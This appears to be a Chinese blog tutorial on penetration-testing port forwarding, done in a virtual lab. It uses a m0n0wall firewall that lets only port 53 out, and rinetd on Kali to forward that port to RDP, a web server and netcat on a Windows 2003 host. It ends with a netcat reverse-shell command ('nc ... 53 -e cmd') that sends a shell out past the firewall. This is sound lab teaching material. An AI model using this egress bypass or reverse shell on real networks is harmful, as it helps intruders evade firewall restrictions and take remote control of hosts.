【渗透测试笔记】之【端口转发】

模拟内网只能访问外网一个端口的情况下,如何访问其他端口,传输自己的远程桌面以及shell。

实验环境配置

配置monowall 防火墙及XP

防火墙模拟的内网和外网的分界线,XP模拟的内网主机。

下载monowall:
https://archive.org/download/generic-pc-1.8.1

新建monawall 虚拟机,添加一块网卡,将网卡一配置为主机模式(模拟内网),网卡二桥接到物理网络(模拟外网)
在这里插入图片描述
首次启动按7 安装到硬盘
在这里插入图片描述
安装完后按1配置接口,提示是否配置VLAN,输入n;接着叫输入LAN 接口名称(模拟内网),输入第一块网卡对应名称,这里是le0;WAN接口即为le1;
在这里插入图片描述
接着会提示其他接口直接回车,y继续,等待重启。

重启后输入2设置内网IP地址,输入LAN的IP1.1.1.1;输入子网掩码24;按y设置DHCP;输入地址池起始地址1.1.1.10;结束地址1.1.1.100;
在这里插入图片描述

按3恢复Web管理默认密码:mono
(4是恢复出厂设置)
按5重启保证设置生效

将一台XP的虚拟机的网卡连接主机模式并开机。(模拟内网主机)
查看IP及网关:
在这里插入图片描述
发现已经自动获取到了1.1.1.10的起始IP,网关也指向了1.1.1.1.说明防火墙配置成功了。接着打开浏览器看看是否能上网:
在这里插入图片描述
正常访问网页。

访问monowall管理页面http://1.1.1.1,账号admin密码mono。
点击rules,LAN,可以看到现在局域网可以向外网任何端口访问。点击绿色的小箭头禁用掉,点击Apply changes。
在这里插入图片描述
现在已经不能上网了。
现在新建一条规则:
在这里插入图片描述
在这里插入图片描述
意思为之内从内网访问外网的53(DNS的TCP&UDP)端口。

点击Save。点击Apply changes。

配置 kali

kali模拟的外网的负责转发端口的主机。

网卡桥接到物理网络。

安装端口转发软件rinetd

apt install rinetd

修改配置:

vi /etc/rinet.config

依次填写本机(kali)IP、本机侦听地址、转发给的目标(2003)IP、目标端口。
在这里插入图片描述
启动,并确认。

rinetd
ps aux | grep rinetd

在这里插入图片描述
查看53端口是否在侦听:

netstat -pantu | grep 53

在这里插入图片描述

配置 Windows 2003

03模拟的外网一台Web 服务器。

网卡桥接到物理网路。

鼠标右键“我的电脑”-“属性”-“远程”,启用远程桌面:
在这里插入图片描述
添加IIS:
在这里插入图片描述

在这里插入图片描述

依次点击:添加/删除Windows组件-应用程序服务器-Internet 信息服务(IIS),进去勾选万维网和FTP,点击确定,点击下一步。(注意要插入光驱)
在这里插入图片描述
安装完后为了更清楚显示,修改一下Web首页显示页面。

C:\Inetpub\wwwroot

目录下,编辑iisstart.htm文件
在这里插入图片描述
我将“建设中”字样改为了“This is Windows 2003”。

用kali访问2003的80端口:
在这里插入图片描述
web服务启用成功。

实现端口转发

访问网页

配置好之后在XP电脑上是不能上网的,现在内网只能访问外网的53端口,现在在浏览器访问kali的53端口

http://192.168.2.106:53/

在这里插入图片描述
成功访问。说明kali成功将端口转发给了服务器。

远程桌面重定向

重新编辑kali转发的端口:

vi /etc/rinetd.conf

将53端口转发给2003的3389端口:
在这里插入图片描述
保存退出,重启rinetd。

pkill rinetd
rinetd

查是否在侦听:

netstat -pantu

打开XP的远程桌面连接工具:
在这里插入图片描述
输入kali的地址和53端口:
在这里插入图片描述
点击链接后出现登录界面:
在这里插入图片描述
输入账号密码后成功登陆2003系统:
在这里插入图片描述

使用NC重定向获取Shell

将kali 的Windows NC程序拷贝到XP和03,Windows NC在kali上的路径:

/usr/share/windows-binaries/nc.exe

03侦听333端口:
在这里插入图片描述

kali将端口转发到03的333端口:

vi /etc/rinetd.conf

在这里插入图片描述
保存退出,重启rinetd。

pkill rinetd
rinetd

XP将shell发送给kali:

nc 192.168.2.106 53 -e cmd

03成功获取到内网XP的shell:
在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值